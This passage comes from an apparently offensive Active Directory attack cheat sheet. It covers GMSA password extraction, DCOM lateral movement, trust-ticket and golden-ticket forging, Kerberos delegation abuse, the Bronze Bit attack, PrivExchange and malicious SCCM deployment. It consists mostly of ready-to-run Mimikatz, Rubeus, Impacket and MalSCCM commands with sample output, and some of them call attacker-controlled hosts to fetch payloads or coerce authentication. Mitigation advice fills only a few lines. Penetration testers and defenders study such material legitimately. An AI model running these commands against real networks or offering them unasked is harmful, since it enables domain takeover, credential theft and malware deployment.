read the GMSA password of the account this ACE applies to. This can be achieved with the Active Directory and DSInternals PowerShell modules. + +```powershell +# Save the blob to a variable +$gmsa = Get-ADServiceAccount -Identity 'SQL_HQ_Primary' -Properties 'msDS-ManagedPassword' +$mp = $gmsa.'msDS-ManagedPassword' + +# Decode the data structure using the DSInternals module +ConvertFrom-ADManagedPasswordBlob $mp +``` +Or +```powershell +python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword +``` + +### ForceChangePassword + +An attacker can change the password of the user this ACE applies to: +* On Windows, this can be achieved with `Set-DomainUserPassword` (PowerView module): +```powershell +$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword +``` + +* On Linux: +```bash +# Using rpcclient from the Samba software suite +rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" + +# Using bloodyAD with pass-the-hash +bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd +``` + + +## DCOM Exploitation + +> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. + + +* Impacket DCOMExec.py + ```ps1 + dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] + dcomexec.py -share C$ -object MMC20 '/:@' + dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig' + + python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' + # -object MMC20 specifies that we wish to instantiate the MMC20.Application object. + # -silentcommand executes the command without attempting to retrieve the output. + ``` +* CheeseTools - https://github.com/klezVirus/CheeseTools + ```powershell + # https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/ + -t, --target=VALUE Target Machine + -b, --binary=VALUE Binary: powershell.exe + -a, --args=VALUE Arguments: -enc + -m, --method=VALUE Methods: MMC20Application, ShellWindows, + ShellBrowserWindow, ExcelDDE, VisioAddonEx, + OutlookShellEx, ExcelXLL, VisioExecLine, + OfficeMacro + -r, --reg, --registry Enable registry manipulation + -h, -?, --help Show Help + + Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro. + ``` +* Invoke-DCOM - https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 + ```powershell + Import-Module .\Invoke-DCOM.ps1 + Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe" + Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe" + ``` + + +### DCOM via MMC Application Class + +This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**. + +```ps1 +PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7") + +# Weaponized example with MSBuild +PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7") +``` + +Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1 + +### DCOM via Office + +* Excel.Application + * DDEInitiate + * RegisterXLL +* Outlook.Application + * CreateObject->Shell.Application->ShellExecute + * CreateObject->ScriptControl (office-32bit only) +* Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window) + * Addons + * ExecuteLine +* Word.Application + * RunAutoMacro + + +```ps1 +# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM +Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9 +Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a + +# Using Excel DDE +PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) +PS C:\> $excel.DisplayAlerts = $false +PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe") + +# Using Excel RegisterXLL +# Can't be used reliably with a remote target +Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1 +PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) +PS> $excel.RegisterXLL("EvilXLL.dll") + +# Using Visio +$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName")) +$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc") + +``` + +### DCOM via ShellExecute + +```ps1 +$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1") +$obj = [System.Activator]::CreateInstance($com) +$item = $obj.Item() +$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +### DCOM via ShellBrowserWindow + +:warning: Windows 10 only, the object doesn't exists in Windows 7 + +```ps1 +$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1") +$obj = [System.Activator]::CreateInstance($com) +$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +## Trust relationship between domains + +* One-way + * Domain B trusts A + * Users in Domain A can access resources in Domain B + * Users in Domain B cannot access resources in Domain A +* Two-way + * Domain A trusts Domain B + * Domain B trusts Domain A + * Authentication requests can be passed between the two domains in both directions + +### Enumerate trusts between domains + +* Native `nltest` + ```powershell + nltest /trusted_domains + ``` +* PowerShell `GetAllTrustRelationships` + ```powershell + ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() + + SourceName TargetName TrustType TrustDirection + ---------- ---------- --------- -------------- + domainA.local domainB.local TreeRoot Bidirectional + ``` +* Crackmapexec module `enum_trusts` + ```powershell + cme ldap -u -p -M enum_trusts + ``` + +### Exploit trusts between domains + +:warning: Require a Domain-Admin level access to the current domain. + +| Source | Target | Technique to use | Trust relationship | +|---|---|---|---| +| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | +| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | +| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | +| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | + + + +## Child Domain to Forest Compromise - SID Hijacking + +Most trees are linked with dual sided trust relationships to allow for sharing of resources. +By default the first domain created if the Forest Root. + +**Requirements**: +- KRBTGT Hash +- Find the SID of the domain + ```powershell + $ Convert-NameToSid target.domain.com\krbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + + # with Impacket + lookupsid.py domain/user:password@10.10.10.10 + ``` +- Replace 502 with 519 to represent Enterprise Admins +- Create golden ticket and attack parent domain. + ```powershell + kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt + ``` + +## Forest to Forest Compromise - Trust Ticket + +* Require: SID filtering disabled + +From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using +Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. + +### Dumping trust passwords (trust keys) + +> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. + +```powershell +lsadump::trust /patch + +or find the TRUST_NAME$ machine account hash +``` + +### Create a forged trust ticket (inter-realm TGT) using Mimikatz + +```powershell +mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi +mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi +``` + +### Use the Trust Ticket file to get a ST for the targeted service + +```powershell +.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local +.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt +``` + +Inject the ST file and access the targeted service with the spoofed rights. + +```powershell +kirbikator lsa .\ticket.kirbi +ls \\machine.domain.local\c$ +``` + +## Privileged Access Management (PAM) Trust + +> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. + +Requirements: +* Windows Server 2016 or earlier + +If we compromise the bastion we get `Domain Admins` privileges on the other domain + +* Default configuration for PAM Trust + ```ps1 + # execute on our forest + netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes + netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes + netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes + netdom trust lab.local /domain:bastion.local /Quarantine:No + # execute on our bastion + netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes + ``` +* Enumerate PAM trusts + ```ps1 + # Detect if current forest is PAM trust + Import ADModule + Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} + + # Enumerate shadow security principals + Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl + + # Enumerate if current forest is managed by a bastion forest + # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External + Get-ADTrust -Filter {(ForestTransitive -eq $True)} + ``` +* Compromise + * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) + * Using SID History +* Persistence + ```ps1 + # Add a compromised user to the group + Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} + ``` + + +## Kerberos Unconstrained Delegation + +> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. + +:warning: Unconstrained delegation used to be the only option available in Windows 2000 + +> **Warning** +> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket + +### SpoolService Abuse with Unconstrained Delegation + +The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. + +**Requirements**: +- Object with Property **Trust this computer for delegation to any service (Kerberos only)** +- Must have **ADS_UF_TRUSTED_FOR_DELEGATION** +- Must not have **ADS_UF_NOT_DELEGATED** flag +- User must not be in the **Protected Users** group +- User must not have the flag **Account is sensitive and cannot be delegated** + +#### Find delegation + +:warning: : Domain controllers usually have unconstrained delegation enabled. +Check the `TRUSTED_FOR_DELEGATION` property. + +* [ADModule](https://github.com/samratashok/ADModule) + ```powershell + # From https://github.com/samratashok/ADModule + PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} + ``` + +* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) + ```powershell + $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 + grep TRUSTED_FOR_DELEGATION domain_computers.grep + ``` + +* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) + ```powershell + cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation + ``` + +* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` +* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` + +#### SpoolService status + +Check if the spool service is running on the remote host + +```powershell +ls \\dc01\pipe\spoolss +python rpcdump.py DOMAIN/user:password@10.10.10.10 +``` + +#### Monitor with Rubeus + +Monitor incoming connections from Rubeus. + +```powershell +Rubeus.exe monitor /interval:1 +``` + +#### Force a connect back from the DC + +Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object. + +> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface. + +```powershell +# From https://github.com/leechristensen/SpoolSample +.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME +.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB +# DC01.HACKER.LAB is the domain controller we want to compromise +# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. + +# From https://github.com/dirkjanm/krbrelayx +printerbug.py 'domain/username:password'@ + +# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689 +python dementor.py -d domain -u username -p password +``` + +If the attack worked you should get a TGT of the domain controller. + +#### Load the ticket + +Extract the base64 TGT from Rubeus output and load it to our current session. + +```powershell +.\Rubeus.exe asktgs /ticket: /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt +``` + +Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` + +Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt` + + +#### Mitigation + +* Ensure sensitive accounts cannot be delegated +* Disable the Print Spooler Service + + +### MS-EFSRPC Abuse with Unconstrained Delegation + +Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`. + +```bash +# Coerce the callback +git clone https://github.com/topotam/PetitPotam +python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP +python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP + +# Extract the ticket +.\Rubeus.exe asktgs /ticket: /ptt +``` + + +## Kerberos Constrained Delegation + +> Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service. + + +### Identify a Constrained Delegation + +* BloodHound: `MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p` +* PowerView: `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft` +* Native + ```powershell + Get-DomainComputer -TrustedToAuth | select -exp dnshostname + Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo + ``` + +### Exploit the Constrained Delegation + +* Impacket + ```ps1 + getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 + ``` + +* Rubeus: S4U2 attack (S4U2self + S4U2proxy) + ```ps1 + # with a password + Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" + + # with a NT hash + Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt + Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt + dir \\dc.domain.com\c$ + ``` + +* Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator" + ```ps1 + # Dump ticket + Rubeus.exe tgtdeleg /nowrap + Rubeus.exe triage + Rubeus.exe dump /luid:0x12d1f7 + + # Create a ticket + Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt + ``` + +* Rubeus : using aes256 keys + ```ps1 + # Get aes256 keys of the machine account + privilege::debug + token::elevate + sekurlsa::ekeys + + # Create a ticket + Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt + ``` + + +### Impersonate a domain user on a resource + +Require: +* SYSTEM level privileges on a machine configured with constrained delegation + +```ps1 +PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null +PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') +PS> $idToImpersonate.Impersonate() +PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name +PS> ls \\dc01.offense.local\c$ +``` + + +## Kerberos Resource Based Constrained Delegation + +Resource-based Constrained Delegation was introduced in Windows Server 2012. + +> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +1. Import **Powermad** and **Powerview** + + ```powershell + PowerShell.exe -ExecutionPolicy Bypass + Import-Module .\powermad.ps1 + Import-Module .\powerview.ps1 + ``` + +2. Get user SID + + ```powershell + $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid + $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID} + $ACE + ConvertFrom-SID $ACE.SecurityIdentifier + ``` + +3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it + + ```powershell + New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force) + ``` + +4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties + + ```powershell + $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid + $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" + $SDBytes = New-Object byte[] ($SD.BinaryLength) + $SD.GetBinaryForm($SDBytes, 0) + Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} + $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity + $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 + $Descriptor.DiscretionaryAcl + ``` + + ```ps1 + # alternative + $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid + $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} + + # alternative + StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND + ``` + +5. Use Rubeus to get hash from password + + ```powershell + Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan + [*] Input password : Weakest123* + [*] Input username : swktest$ + [*] Input domain : factory.lan + [*] Salt : FACTORY.LANswktest + [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD + [*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498 + [*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 + [*] des_cbc_md5 : BA297CFD07E62A5E + ``` + +6. Impersonate domain admin using our newly created machine account + + ```powershell + .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + + [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' + [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) + [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan' + [*] Sending S4U2proxy request + [+] S4U2proxy success! + [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan': + + doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD + AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE + LmZhY3RvcnkubGFu + + [*] Action: Import Ticket + [+] Ticket successfully imported! + ``` + +## Kerberos Service for User Extension + +* Service For User To Self which allows a service to obtain a TGS on behalf of another user +* Service For User To Proxy which allows a service to obtain a TGS on behalf of another user on another service + +### S4U2self - Privilege Escalation + +1. Get a TGT + * Using Unconstrained Delegation + * Using the current machine account: `Rubeus.exe tgtdeleg /nowrap` +2. Use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine. + ```ps1 + Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001.domain.local" /ticket:"base64ticket" + Rubeus.exe ptt /ticket:"base64ticket" + + Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001" /ticket:"base64ticket" /ptt + ``` + +The "Network Service" account and the AppPool identities can act as the computer account in terms of Active Directory, they are only restrained locally. Therefore it is possible to invoke S4U2self if you run as one of these and request a service ticket for any user (e.g. someone with local admin rights, like DA) to yourself. + +```ps1 +# The Rubeus execution will fail when trying the S4UProxy step, but the ticket generated by S4USelf will be printed. +Rubeus.exe s4u /user:${computerAccount} /msdsspn:cifs/${computerDNS} /impersonateuser:${localAdmin} /ticket:${TGT} /nowrap +# The service name is not included in the TGS ciphered data and can be modified at will. +Rubeus.exe tgssub /ticket:${ticket} /altservice:cifs/${ServerDNSName} /ptt +``` + + +## Kerberos Bronze Bit Attack - CVE-2020-17049 + +> An attacker can impersonate users which are not allowed to be delegated. This includes members of the **Protected Users** group and any other users explicitly configured as **sensitive and cannot be delegated**. + +> Patch is out on November 10, 2020, DC are most likely vulnerable until [February 2021](https://support.microsoft.com/en-us/help/4598347/managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049). + +:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)` + +Requirements: +* Service account's password hash +* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation` +* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) + +**Attack #1** - Bypass the `Trust this user for delegation to specified services only – Use Kerberos only` protection and impersonate a user who is protected from delegation. + +```powershell +# forwardable flag is only protected by the ticket encryption which uses the service account's password +$ getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes -aesKey test.local/Service1 -force-forwardable -dc-ip # -> Forwardable + +$ getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable + +# Load the ticket +.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit + +# Access "c$" +ls \\service2.test.local\c$ +``` + +**Attack #2** - Write Permissions to one or more objects in the AD + +```powershell +# Create a new machine account +Import-Module .\Powermad\powermad.ps1 +New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force) +.\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit + +# Set PrincipalsAllowedToDelegateToAccount +Install-WindowsFeature RSAT-AD-PowerShell +Import-Module ActiveDirectory +Get-ADComputer AttackerService +Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ +Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount + +# Execute the attack +python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardableet-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$ + +# Load the ticket +.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null +``` + +## PrivExchange attack + +Exchange your privileges for Domain Admin privs by abusing Exchange. +:warning: You need a shell on a user account with a mailbox. + + +1. Exchange server hostname or IP address + + ```bash + pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username + ``` + + +2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket). + + ```powershell + ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username + ``` + + +3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine. + + ```bash + # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py + python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx + python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange + + # https://github.com/G0ldenGunSec/PowerPriv + powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016 + ``` + +4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash + + ```bash + python secretsdump.py xxxxxxxxxx -just-dc + python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm + ``` + +5. Clean your mess and restore a previous state of the user's ACL + + ```powershell + python aclpwn.py --restore ../aclpwn-20190319-125741.restore + ``` + +Alternatively you can use the Metasploit module + +[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420) + +Alternatively you can use an all-in-one tool : Exchange2domain. + +```powershell +git clone github.com/Ridter/Exchange2domain +python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip +python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip +``` + +## SCCM Deployment + +> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. + +* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) +* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) + + +* Using **SharpSCCM** + ```ps1 + .\SharpSCCM.exe get device --server --site-code + .\SharpSCCM.exe exec -d -r + .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug + ``` +* Compromise client, use locate to find management server + ```ps1 + MalSCCM.exe locate + ``` +* Enumerate over WMI as an administrator of the Distribution Point + ```ps1 + MalSCCM.exe inspect /server: /groups + ``` +* Compromise management server, use locate to find primary server +* Use `inspect` on primary server to view who you can target + ```ps1 + MalSCCM.exe inspect /all + MalSCCM.exe inspect /computers + MalSCCM.exe inspect /primaryusers + MalSCCM.exe inspect /groups + ``` +* Create a new device group for the machines you want to laterally move too + ```ps1 + MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device + MalSCCM.exe inspect /groups + ``` + +* Add your targets into the new group + ```ps1 + MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL + ``` +* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$` + ```ps1 + MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe" + MalSCCM.exe inspect /applications + ``` + +* Deploy the application to the target group + ```ps1 + MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment + MalSCCM.exe inspect /deployments + ``` +* Force the target group to checkin for updates + ```ps1 + MalSCCM.exe checkin /groupname:TargetGroup + ``` + +* Cleanup the application, deployment and group + ```ps1 + MalSCCM.exe app /cleanup /name:demoapp + MalSCCM.exe group /delete /groupname:TargetGroup + ``` + + 